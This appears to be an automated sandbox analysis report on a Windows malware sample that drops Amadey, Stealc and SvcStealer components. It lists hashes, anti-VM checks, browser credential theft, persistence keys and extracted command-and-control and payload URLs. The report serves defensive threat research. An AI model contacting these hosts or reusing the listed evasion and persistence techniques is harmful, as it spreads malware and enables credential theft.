Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 04:10
Static task
static1
Behavioral task
behavioral1
Sample
ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe
Resource
win10v2004-20250217-en
General
-
Target
ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe
-
Size
3.8MB
-
MD5
566a268599601d1a6240fed67b7b7f7a
-
SHA1
8c4bb8c0c241b94e61cf78b48b917610ff745066
-
SHA256
ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936
-
SHA512
efa91f03daee0bdb3c0c2fc1550a273dadec09e60891c62ac8d9d52b2bcfbe0a0734e251c084b1a027edd80917c8ffba7696bb51b9067a4b46a6644060c1e189
-
SSDEEP
98304:n/pTdQcAlAHutMjZzQ6LFOBOBrWMz9GTiaE/Uuieu7uoe5sjTibT:n/pTdQceWjZz9MOB6jTigXpes2b
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
reno
http://185.215.113.115
-
url_path
/c4becf79229cb002.php
Signatures
-
Amadey family
-
Detects SvcStealer Payload 3 IoCs
SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.
resource yara_rule behavioral1/files/0x0013000000023bca-1939.dat family_svcstealer behavioral1/memory/5704-1947-0x00007FF7C4FF0000-0x00007FF7C508F000-memory.dmp family_svcstealer behavioral1/memory/5704-1952-0x00007FF7C4FF0000-0x00007FF7C508F000-memory.dmp family_svcstealer -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 764 created 2776 764 files.exe 51 -
SvcStealer, Diamotrix
SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.
-
Svcstealer family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6e7f5c2047.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2r6275.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8I3X3EA1A40B3S1KC14QDE1AWC5.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f65O.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 212261a833.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6406e1fd4e.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 64 1644 powershell.exe 99 4980 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1644 powershell.exe 4980 powershell.exe 1116 powershell.exe 4932 powershell.exe 1588 powershell.exe -
Downloads MZ/PE file 13 IoCs
flow pid Process 31 1460 rapes.exe 62 2568 2r6275.exe 64 1644 powershell.exe 99 4980 powershell.exe 166 4364 futors.exe 37 1460 rapes.exe 115 1460 rapes.exe 181 4364 futors.exe 196 1460 rapes.exe 228 5912 BitLockerToGo.exe 267 1460 rapes.exe 59 4364 futors.exe 59 4364 futors.exe -
Uses browser remote debugging 2 TTPs 16 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 452 msedge.exe 4840 chrome.exe 3412 chrome.exe 3492 msedge.exe 6132 chrome.exe 1900 chrome.exe 5240 msedge.exe 2724 chrome.exe 4412 chrome.exe 3652 chrome.exe 2276 chrome.exe 5932 chrome.exe 4760 msedge.exe 5764 chrome.exe 5524 msedge.exe 396 msedge.exe -
.NET Reactor proctector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral1/files/0x000b000000023d91-1246.dat net_reactor behavioral1/memory/5552-1254-0x00000000001F0000-0x0000000000250000-memory.dmp net_reactor -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 212261a833.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6406e1fd4e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2r6275.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8I3X3EA1A40B3S1KC14QDE1AWC5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f65O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f65O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 212261a833.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6406e1fd4e.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6e7f5c2047.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2r6275.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8I3X3EA1A40B3S1KC14QDE1AWC5.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6e7f5c2047.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation amnew.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation futors.exe Key value queried \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation 1F01J8.exe -
Executes dropped EXE 37 IoCs
pid Process 1356 m1c06.exe 3004 1F01J8.exe 1460 rapes.exe 2568 2r6275.exe 1688 amnew.exe 4364 futors.exe 4180 16378c5bc0.exe 5024 8I3X3EA1A40B3S1KC14QDE1AWC5.exe 3572 TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE 4520 3f65O.exe 5356 z3SJkC5.exe 5284 z3SJkC5.exe 5192 WiseTurbo.exe 5616 483d2fa8a0d53818306efeb32d3.exe 5600 WiseTurbo.exe 5248 trano1221.exe 5788 trano1221.exe 6000 cronikxqqq.exe 6128 cronikxqqq.exe 5848 rapes.exe 5416 futors.exe 5936 alex122121.exe 5720 alex122121.exe 3756 8jQumY5.exe 764 files.exe 3708 BXxKvLN.exe 5552 mAtJWNv.exe 2632 mAtJWNv.exe 4084 mAtJWNv.exe 232 212261a833.exe 6000 zY9sqWs.exe 5876 rapes.exe 4652 futors.exe 5772 6406e1fd4e.exe 5496 JCFx2xj.exe 3420 6e7f5c2047.exe 5704 4klgwMz.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 6e7f5c2047.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 2r6275.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 8I3X3EA1A40B3S1KC14QDE1AWC5.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 3f65O.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 212261a833.exe Key opened \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine 6406e1fd4e.exe -
Loads dropped DLL 37 IoCs
pid Process 5284 z3SJkC5.exe 5192 WiseTurbo.exe 5600 WiseTurbo.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 5788 trano1221.exe 4520 3f65O.exe 4520 3f65O.exe 5428 WatcherUpdate_test.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\16378c5bc0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097710101\\16378c5bc0.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10097720121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\212261a833.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10016830101\\212261a833.exe" futors.exe Set value (str) \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\6406e1fd4e.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10016840101\\6406e1fd4e.exe" futors.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" m1c06.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000300000001e720-59.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 2568 2r6275.exe 5024 8I3X3EA1A40B3S1KC14QDE1AWC5.exe 3572 TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE 4520 3f65O.exe 5616 483d2fa8a0d53818306efeb32d3.exe 232 212261a833.exe 5772 6406e1fd4e.exe 3420 6e7f5c2047.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5600 set thread context of 5840 5600 WiseTurbo.exe 154 PID 6000 set thread context of 6128 6000 cronikxqqq.exe 179 PID 5936 set thread context of 5720 5936 alex122121.exe 192 PID 5552 set thread context of 4084 5552 mAtJWNv.exe 202 PID 232 set thread context of 5912 232 212261a833.exe 209 PID 5772 set thread context of 3076 5772 6406e1fd4e.exe 211 -
resource yara_rule behavioral1/memory/5788-883-0x00007FFEFBAE0000-0x00007FFEFC0C9000-memory.dmp upx behavioral1/memory/5788-885-0x00007FFF0E890000-0x00007FFF0E89F000-memory.dmp upx behavioral1/memory/5788-884-0x00007FFEFF3B0000-0x00007FFEFF3D3000-memory.dmp upx behavioral1/memory/5788-886-0x00007FFEFEED0000-0x00007FFEFEEE9000-memory.dmp upx behavioral1/memory/5788-887-0x00007FFF0E700000-0x00007FFF0E70D000-memory.dmp upx behavioral1/memory/5788-888-0x00007FFEFCCF0000-0x00007FFEFCD09000-memory.dmp upx behavioral1/memory/5788-889-0x00007FFEFCCC0000-0x00007FFEFCCED000-memory.dmp upx behavioral1/memory/5788-890-0x00007FFEFCC80000-0x00007FFEFCCB6000-memory.dmp upx behavioral1/memory/5788-891-0x00007FFF0DB20000-0x00007FFF0DB2D000-memory.dmp upx behavioral1/memory/5788-892-0x00007FFEFBAA0000-0x00007FFEFBAD3000-memory.dmp upx behavioral1/memory/5788-894-0x00007FFEFB9D0000-0x00007FFEFBA9D000-memory.dmp upx behavioral1/memory/5788-893-0x00007FFEFBAE0000-0x00007FFEFC0C9000-memory.dmp upx behavioral1/memory/5788-896-0x00007FFEFB4B0000-0x00007FFEFB9D0000-memory.dmp upx behavioral1/memory/5788-897-0x00007FFEFF3B0000-0x00007FFEFF3D3000-memory.dmp upx behavioral1/memory/5788-898-0x00007FFEFB3E0000-0x00007FFEFB4AF000-memory.dmp upx behavioral1/memory/5788-900-0x00007FFEFB350000-0x00007FFEFB3D7000-memory.dmp upx behavioral1/memory/5788-899-0x00007FFEFEED0000-0x00007FFEFEEE9000-memory.dmp upx behavioral1/memory/5788-902-0x00007FFEFB330000-0x00007FFEFB344000-memory.dmp upx behavioral1/memory/5788-901-0x00007FFF0E700000-0x00007FFF0E70D000-memory.dmp upx behavioral1/memory/5788-907-0x00007FFEFB1E0000-0x00007FFEFB2FC000-memory.dmp upx behavioral1/memory/5788-911-0x00007FFF0DB20000-0x00007FFF0DB2D000-memory.dmp upx behavioral1/memory/5788-910-0x00007FFEFB170000-0x00007FFEFB182000-memory.dmp upx behavioral1/memory/5788-909-0x00007FFEFB190000-0x00007FFEFB1D3000-memory.dmp upx behavioral1/memory/5788-908-0x00007FFEFCC80000-0x00007FFEFCCB6000-memory.dmp upx behavioral1/memory/5788-906-0x00007FFEFCCC0000-0x00007FFEFCCED000-memory.dmp upx behavioral1/memory/5788-905-0x00007FFEFB300000-0x00007FFEFB326000-memory.dmp upx behavioral1/memory/5788-904-0x00007FFF0A000000-0x00007FFF0A00B000-memory.dmp upx behavioral1/memory/5788-903-0x00007FFEFCCF0000-0x00007FFEFCD09000-memory.dmp upx behavioral1/memory/5788-912-0x00007FFEFBAA0000-0x00007FFEFBAD3000-memory.dmp upx behavioral1/memory/5788-916-0x00007FFEFAEF0000-0x00007FFEFB139000-memory.dmp upx behavioral1/memory/5788-915-0x00007FFEFB9D0000-0x00007FFEFBA9D000-memory.dmp upx behavioral1/memory/5788-914-0x00007FFEFB140000-0x00007FFEFB164000-memory.dmp upx behavioral1/memory/5788-917-0x00007FFEFB4B0000-0x00007FFEFB9D0000-memory.dmp upx behavioral1/memory/5788-920-0x00007FFEFB3E0000-0x00007FFEFB4AF000-memory.dmp upx behavioral1/memory/5788-919-0x00007FFEFAE00000-0x00007FFEFAEBC000-memory.dmp upx behavioral1/memory/5788-918-0x00007FFEFAEC0000-0x00007FFEFAEEE000-memory.dmp upx behavioral1/memory/5788-930-0x00007FFEFADD0000-0x00007FFEFADFB000-memory.dmp upx behavioral1/memory/5788-929-0x00007FFEFB350000-0x00007FFEFB3D7000-memory.dmp upx behavioral1/memory/5788-962-0x00007FFEFB300000-0x00007FFEFB326000-memory.dmp upx behavioral1/memory/5788-982-0x00007FFEFB1E0000-0x00007FFEFB2FC000-memory.dmp upx behavioral1/memory/5788-981-0x00007FFEFB9D0000-0x00007FFEFBA9D000-memory.dmp upx behavioral1/memory/5788-980-0x00007FFEFBAA0000-0x00007FFEFBAD3000-memory.dmp upx behavioral1/memory/5788-979-0x00007FFF0DB20000-0x00007FFF0DB2D000-memory.dmp upx behavioral1/memory/5788-978-0x00007FFEFB170000-0x00007FFEFB182000-memory.dmp upx behavioral1/memory/5788-977-0x00007FFEFCCC0000-0x00007FFEFCCED000-memory.dmp upx behavioral1/memory/5788-976-0x00007FFEFCCF0000-0x00007FFEFCD09000-memory.dmp upx behavioral1/memory/5788-975-0x00007FFF0E700000-0x00007FFF0E70D000-memory.dmp upx behavioral1/memory/5788-974-0x00007FFEFEED0000-0x00007FFEFEEE9000-memory.dmp upx behavioral1/memory/5788-973-0x00007FFF0E890000-0x00007FFF0E89F000-memory.dmp upx behavioral1/memory/5788-972-0x00007FFEFF3B0000-0x00007FFEFF3D3000-memory.dmp upx behavioral1/memory/5788-971-0x00007FFEFAE00000-0x00007FFEFAEBC000-memory.dmp upx behavioral1/memory/5788-968-0x00007FFEFAEC0000-0x00007FFEFAEEE000-memory.dmp upx behavioral1/memory/5788-967-0x00007FFEFAEF0000-0x00007FFEFB139000-memory.dmp upx behavioral1/memory/5788-966-0x00007FFEFB140000-0x00007FFEFB164000-memory.dmp upx behavioral1/memory/5788-964-0x00007FFEFB190000-0x00007FFEFB1D3000-memory.dmp upx behavioral1/memory/5788-961-0x00007FFF0A000000-0x00007FFF0A00B000-memory.dmp upx behavioral1/memory/5788-960-0x00007FFEFB330000-0x00007FFEFB344000-memory.dmp upx behavioral1/memory/5788-959-0x00007FFEFB350000-0x00007FFEFB3D7000-memory.dmp upx behavioral1/memory/5788-958-0x00007FFEFB3E0000-0x00007FFEFB4AF000-memory.dmp upx behavioral1/memory/5788-953-0x00007FFEFCC80000-0x00007FFEFCCB6000-memory.dmp upx behavioral1/memory/5788-970-0x00007FFEFADD0000-0x00007FFEFADFB000-memory.dmp upx behavioral1/memory/5788-957-0x00007FFEFB4B0000-0x00007FFEFB9D0000-memory.dmp upx behavioral1/memory/5788-946-0x00007FFEFBAE0000-0x00007FFEFC0C9000-memory.dmp upx -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\futors.job amnew.exe File created C:\Windows\Tasks\rapes.job 1F01J8.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000300000001e726-769.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 5544 5284 WerFault.exe 145 6056 5284 WerFault.exe 145 5784 6000 WerFault.exe 178 5336 5936 WerFault.exe 190 3592 5552 WerFault.exe 200 -
System Location Discovery: System Language Discovery 1 TTPs 48 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6406e1fd4e.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2r6275.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8I3X3EA1A40B3S1KC14QDE1AWC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex122121.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language alex122121.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8jQumY5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language files.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempSMWIFCSQGTNKYW9PVNOL6IXC6DDO2UE4.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 6e7f5c2047.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language amnew.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language m1c06.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1F01J8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WiseTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WiseTurbo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mAtJWNv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 212261a833.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JCFx2xj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language z3SJkC5.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ff052d1ed5c43bf2024119b2971ea7cab677dc808317e258ffebcd3ce73c1936.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language futors.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 16378c5bc0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f65O.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cronikxqqq.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mAtJWNv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3f65O.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3f65O.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4980 timeout.exe -
Enumerates system info in registry 2 TTPs 16 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856214479502639" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2396 schtasks.exe 1312 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
